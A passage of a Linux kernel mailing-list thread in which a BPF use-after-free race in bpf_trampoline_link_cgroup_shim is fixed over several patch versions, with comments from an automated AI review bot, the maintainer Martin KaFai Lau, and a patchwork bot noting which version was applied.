+ msleep(100);
WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link,
shim_link->trampoline, NULL));
bpf_trampoline_put(shim_link->trampoline);
}

Before the patch, running a PoC easily reproduced the crash(almost 100%)
with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..ac99725403ad 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -779,6 +779,7 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
struct bpf_shim_tramp_link *shim_link = NULL;
struct bpf_attach_target_info tgt_info = {};
struct bpf_trampoline *tr;
+ struct bpf_link *link;
bpf_func_t bpf_func;
u64 key;
int err;
@@ -801,12 +802,13 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,

shim_link = cgroup_shim_find(tr, bpf_func);
if (shim_link) {
- /* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
- mutex_unlock(&tr->mutex);
- bpf_trampoline_put(tr); /* bpf_trampoline_get above */
- return 0;
+ link = &shim_link->link.link;
+ if (link == bpf_link_inc_not_zero(link)) {
+ /* Reusing existing shim attached by the other program. */
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr); /* bpf_trampoline_get above */
+ return 0;
+ }
}

/* Allocate and install new shim. */
--
2.51.0

bot+b...@kernel.org

unread,
Feb 25, 2026, 2:38:14 AMFeb 25
to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c

[ ... ]

> @@ -1003,12 +1004,13 @@ struct bpf_attach_target_info tgt_info = {};
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> if (shim_link) {
> + link = &shim_link->link.link;
> + if (link == bpf_link_inc_not_zero(link)) {

The other callers of bpf_link_inc_not_zero() in the tree check the
return value with IS_ERR(), for example in
bpf_link_get_curr_or_next():

link = bpf_link_inc_not_zero(link);
if (IS_ERR(link)) {
(*id)++;
goto again;
}

Would it be more consistent to use IS_ERR() here as well? Something
like:

if (!IS_ERR(bpf_link_inc_not_zero(link))) {

> + /* Reusing existing shim attached by the other program. */
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> + return 0;
> + }
> }

This commit fixes a use-after-free introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
that could resurrect a zero-refcount link.

Should this include a Fixes: tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22386382516

AI-authorship-score: medium
AI-authorship-explanation: Commit message uses markdown-style backtick formatting and verbose explanatory style atypical of kernel patches, but the v1-to-v2 iteration addressing specific reviewer feedback and manual reproduction testing suggest human authorship.
issues-found: 2
issue-severity-score: low
issue-severity-explanation: Missing Fixes tag for a use-after-free bug fix and non-idiomatic bpf_link_inc_not_zero() return value comparison; the fix itself is technically correct.

Martin KaFai Lau

unread,
Feb 27, 2026, 3:33:48 PMFeb 27
to xul...@uniontech.com, bot+b...@kernel.org, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev
>
>> + /* Reusing existing shim attached by the other program. */
>> + mutex_unlock(&tr->mutex);
>> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
>> + return 0;
>> + }
>> }
>
> This commit fixes a use-after-free introduced by commit 69fd337a975c
> ("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
> that could resurrect a zero-refcount link.
>
> Should this include a Fixes: tag?
>
> Suggested:
> Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

On top of the Fixes tag, please add bpf to the subject, e.g. "[PATCH bpf
v3] bpf: Fix race condition...". Please also use the
FirstName[[:space:]]LastName <email> format in the "Signed-off-by". For
example: Lang Xu <xul...@uniontech.com>. Understood that there are
different name formatting but the reviewers can't possibly know all of
them, so it is useful to write it in a way that most people in the list
can understand.

xulang

unread,
Feb 27, 2026, 9:26:05 PMFeb 27
to marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>
Signed-off-by: Lang Xu <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..ac99725403ad 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -779,6 +779,7 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
struct bpf_shim_tramp_link *shim_link = NULL;
struct bpf_attach_target_info tgt_info = {};
struct bpf_trampoline *tr;
+ struct bpf_link *link;
bpf_func_t bpf_func;
u64 key;
int err;
@@ -801,12 +802,13 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,

shim_link = cgroup_shim_find(tr, bpf_func);
if (shim_link) {
- /* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
- mutex_unlock(&tr->mutex);
- bpf_trampoline_put(tr); /* bpf_trampoline_get above */
- return 0;
+ link = &shim_link->link.link;
+ if (link == bpf_link_inc_not_zero(link)) {
+ /* Reusing existing shim attached by the other program. */
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr); /* bpf_trampoline_get above */
+ return 0;
+ }
}

bot+b...@kernel.org

unread,
Feb 27, 2026, 10:04:21 PMFeb 27
to xul...@uniontech.com, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c

[ ... ]

> @@ -1003,12 +1004,13 @@ struct bpf_attach_target_info tgt_info = {};
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> if (shim_link) {
> - /* Reusing existing shim attached by the other program. */
> - bpf_link_inc(&shim_link->link.link);
> -
> - mutex_unlock(&tr->mutex);
> - bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> - return 0;
> + link = &shim_link->link.link;
> + if (link == bpf_link_inc_not_zero(link)) {

The other callers of bpf_link_inc_not_zero() check the return value
using IS_ERR(), for example bpf_link_by_id():

link = bpf_link_inc_not_zero(link);

and bpf_link_get_curr_or_next():

link = bpf_link_inc_not_zero(link);
if (IS_ERR(link)) {

Should this use the same IS_ERR() pattern for consistency? Something
like:

if (!IS_ERR(bpf_link_inc_not_zero(link))) {

> + /* Reusing existing shim attached by the other program. */
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> + return 0;
> + }
> }

This commit fixes a use-after-free introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
that could resurrect a zero-refcount link. It appears to be missing
a Fixes: tag. Martin KaFai Lau's review of v2 also expected this tag
to be present.

Suggested:

Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

https://lore.kernel.org/bpf/cd99eba7-ac03-4b53...@linux.dev/


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22511586078

AI-authorship-score: low
AI-authorship-explanation: Human authorship patterns: references maintainer suggestion, informal testing description, iterative v1/v2/v3 development with reviewer feedback, addresses a bug reported by a different researcher.
issues-found: 2
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag (requested by BPF maintainer) and non-standard bpf_link_inc_not_zero() return value comparison pattern; neither causes runtime problems.

Martin KaFai Lau

unread,
Mar 2, 2026, 9:39:43 PMMar 2
to xul...@uniontech.com, bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev
The same feedback by ai-review. I don't have a strong opinion. However,
the newly added "struct bpf_link *link" variable is not needed also. I
would carry the ai's suggestion further and remove the new local
variable also. Just test:

if (!IS_ERR(bpf_link_inc_not_zero(&shim_link->link.link))) {

>
>> + /* Reusing existing shim attached by the other program. */
>> + mutex_unlock(&tr->mutex);
>> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
>> + return 0;
>> + }
>> }
>
> This commit fixes a use-after-free introduced by commit 69fd337a975c
> ("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
> that could resurrect a zero-refcount link. It appears to be missing
> a Fixes: tag. Martin KaFai Lau's review of v2 also expected this tag
> to be present.

Indeed, please ensure to address the earlier reviewer's feedback.

pw-bot: cr

xulang

unread,
Mar 3, 2026, 3:36:59 AMMar 3
to marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")
Signed-off-by: Lang Xu <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index dbe7754b4f4e..894cd6f205f5 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -749,10 +749,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
mutex_lock(&tr->mutex);

shim_link = cgroup_shim_find(tr, bpf_func);
- if (shim_link) {
+ if (shim_link && !IS_ERR(bpf_link_inc_not_zero(&shim_link->link.link))) {
/* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
mutex_unlock(&tr->mutex);
bpf_trampoline_put(tr); /* bpf_trampoline_get above */
return 0;
--
2.51.0

bot+b...@kernel.org

unread,
Mar 3, 2026, 4:28:40 AMMar 3
to xul...@uniontech.com, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
> bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

The subject references bpf_trampoline_unlink_cgroup_shim, but the
change is in bpf_trampoline_link_cgroup_shim. The commit body
correctly identifies the fix location:

> To fix this:
> Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.

Should the subject say bpf_trampoline_link_cgroup_shim instead?

---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22615516146

xulang

unread,
Mar 3, 2026, 4:52:57 AMMar 3
to bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, marti...@linux.dev, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

Based on Martin KaFai Lau's suggestions, I have created a simple patch.

To fix this:
Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.

patchwork-b...@kernel.org

unread,
Mar 3, 2026, 6:30:07 PMMar 3
to xulang, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev
Hello:

This patch was applied to bpf/bpf.git (master)
by Martin KaFai Lau <marti...@kernel.org>:

On Tue, 3 Mar 2026 16:36:26 +0800 you wrote:
> From: Lang Xu <xul...@uniontech.com>
>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> [...]

Here is the summary with links:
- [bpf,v4] bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim
https://git.kernel.org/bpf/bpf/c/56145d237385

You are awesome, thank you!
--
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html


patchwork-b...@kernel.org

unread,
Mar 3, 2026, 6:30:13 PMMar 3
to xulang, bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, marti...@linux.dev, s...@fomichev.me, yongho...@linux.dev
Hello:

This patch was applied to bpf/bpf.git (master)
by Martin KaFai Lau <marti...@kernel.org>:

On Tue, 3 Mar 2026 17:52:17 +0800 you wrote:
> From: Lang Xu <xul...@uniontech.com>
>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> [...]

Here is the summary with links:
- [bpf,v5] bpf: fix: Race condition in bpf_trampoline_link_cgroup_shim

Martin KaFai Lau

unread,
Mar 3, 2026, 6:47:03 PMMar 3
to patchwork-b...@kernel.org, xulang, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev


On 3/3/26 3:30 PM, patchwork-b...@kernel.org wrote:
> Hello:
>
> This patch was applied to bpf/bpf.git (master)
> by Martin KaFai Lau <marti...@kernel.org>:
>
> On Tue, 3 Mar 2026 16:36:26 +0800 you wrote:
>> From: Lang Xu <xul...@uniontech.com>
>>
>> The root cause of this bug is that when `bpf_link_put` reduces the
>> refcount of `shim_link->link.link` to zero, the resource is considered
>> released but may still be referenced via `tr->progs_hlist` in
>> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
>> `bpf_shim_tramp_link_release` is deferred. During this window, another
>> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>>
>> [...]
>
> Here is the summary with links:
> - [bpf,v4] bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim
> https://git.kernel.org/bpf/bpf/c/56145d237385

The bot is confused. It replied to v4 and v5. Only v5 is landed.

Reply all
Reply to author
Forward
0 new messages